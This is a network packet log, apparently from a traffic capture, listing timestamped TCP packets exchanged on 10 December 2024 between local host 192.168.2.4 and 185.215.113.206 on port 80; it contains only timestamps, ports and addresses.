Dec 10, 2024 00:42:29.903203011 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.903887033 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.903944969 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.903953075 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.903983116 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.904758930 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.904810905 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.904906988 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.904953003 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.905541897 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.905592918 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.905633926 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.905675888 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.906361103 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.906408072 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.906476021 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.906522036 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.907222986 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.907273054 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.907327890 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.907373905 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.908039093 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.908087015 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.908257008 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.908299923 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.908869028 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.908914089 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.908936024 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.908977032 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.909683943 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.909732103 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.909796953 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.909845114 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.910554886 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.910604000 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.910695076 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.910742044 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.911339998 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.911387920 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.911421061 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.911468983 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.912187099 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.912233114 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.912267923 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.912308931 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.912997961 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.913045883 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.913079023 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.913129091 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.913836002 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.913885117 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.913925886 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.913975000 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.914711952 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.914726973 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:29.914755106 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:29.914783001 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.020207882 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.020287991 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.020319939 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.020359993 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.020627022 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.020667076 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.020678997 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.020736933 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.021429062 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.021471024 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.143399000 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.143452883 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.143481970 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.143520117 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.143733978 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.143779039 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.143790007 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.143827915 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.144588947 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.144639969 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.144716024 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.144752979 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.145401001 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.145438910 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.145515919 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.145550013 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.146258116 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.146316051 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.146363020 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.146409988 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.147090912 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.147130013 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.147191048 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.147228956 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.147895098 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.147932053 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.148000956 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.148045063 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.148720980 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.148761988 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.148787975 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.148825884 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.149542093 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.149584055 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.149663925 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.149702072 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.150384903 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.150430918 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.150551081 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.150584936 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.151221991 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.151273966 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.151370049 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.151412010 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.152034998 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.152079105 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.152159929 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.152199984 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.152883053 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.152924061 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.152968884 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.153007984 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.153703928 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.153745890 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.153840065 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.153879881 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.154550076 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.154598951 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.154663086 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.154702902 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.155365944 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.155411005 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.155510902 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.155555010 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.156222105 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.156265020 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.156315088 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.156354904 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.157027006 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.157071114 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.157208920 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.157250881 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.157830000 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.157877922 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.157962084 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.158005953 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.158685923 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.158721924 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.158781052 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.158821106 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.159512997 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.159554958 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.159603119 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.159642935 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.160345078 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.160387039 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.160586119 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.160623074 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.161181927 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.161225080 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.161298990 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.161345959 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.161988020 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.162031889 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.162125111 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.162170887 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.162811041 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.162852049 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.162923098 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.162961006 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.163644075 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.163686991 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.163861036 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.163907051 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.164477110 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.164525032 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.164554119 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.164589882 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.165395975 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.165438890 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.165499926 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.165548086 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.166112900 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.166157007 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.166246891 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.166290998 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.166944981 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.166991949 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.167068958 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.167128086 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.167772055 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.167813063 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.167871952 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.167917013 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.168608904 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.168649912 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.168719053 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.168761969 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.169400930 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.169446945 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.169560909 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.169605970 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.170259953 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.170304060 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.170411110 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.170455933 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.171160936 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.171197891 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.171209097 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.171225071 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.172003031 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.172045946 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.172072887 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.172112942 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.172739029 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.172785044 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.172833920 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.172873020 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.173558950 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.173604012 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.173619032 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.173656940 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.174407959 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.174453974 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.174537897 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.174583912 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.175231934 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.175277948 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.175363064 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.175407887 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.176074028 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.176119089 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.176132917 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.176170111 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.176879883 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.176925898 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.177006006 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.177057981 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.177706957 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.177752018 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.177778006 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.177820921 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.178534985 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.178580999 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.178606033 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.178639889 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.179380894 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.179429054 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.179523945 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.179569006 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.180299044 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.180345058 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.180435896 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.180481911 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.181010008 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.181055069 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.181174040 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.181219101 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.181845903 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.181890011 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.181981087 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.182025909 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.182681084 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.182727098 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.182806969 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.182849884 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.183492899 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.183538914 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.183623075 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.183670044 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.184336901 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.184381008 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.184444904 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.184489965 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.185187101 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.185233116 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.185283899 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.185332060 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.186012983 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.186062098 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.186096907 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.186141968 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.186780930 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.186824083 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.335609913 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.335645914 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.335726023 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.335886002 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.335927963 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.335983992 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.336035967 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.336690903 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.336741924 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.336776972 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.336818933 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.337541103 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.337594986 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.337654114 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.337699890 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.338360071 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.338408947 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.338457108 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.338498116 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.339185953 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.339267015 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.339293957 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.339334965 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.339997053 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.340054035 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.340121984 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.340168953 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.340914965 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.340959072 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.341027021 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.341077089 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.341667891 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.341713905 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.341872931 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.341917992 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.342502117 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.342550993 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.342608929 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.342653990 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.343323946 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.343369007 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.343400002 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.343444109 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.372231960 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.491516113 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.809103966 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.809196949 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.809206963 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.809242010 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.809478045 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.809515953 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.809551954 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.809592009 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.810111046 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.810152054 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.810205936 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.810244083 CET	49749	80	192.168.2.4	185.215.113.206
Dec 10, 2024 00:42:30.810923100 CET	80	49749	185.215.113.206	192.168.2.4
Dec 10, 2024 00:42:30.810966015 CET	49749	80	192.168.2.4	185.215.113.206
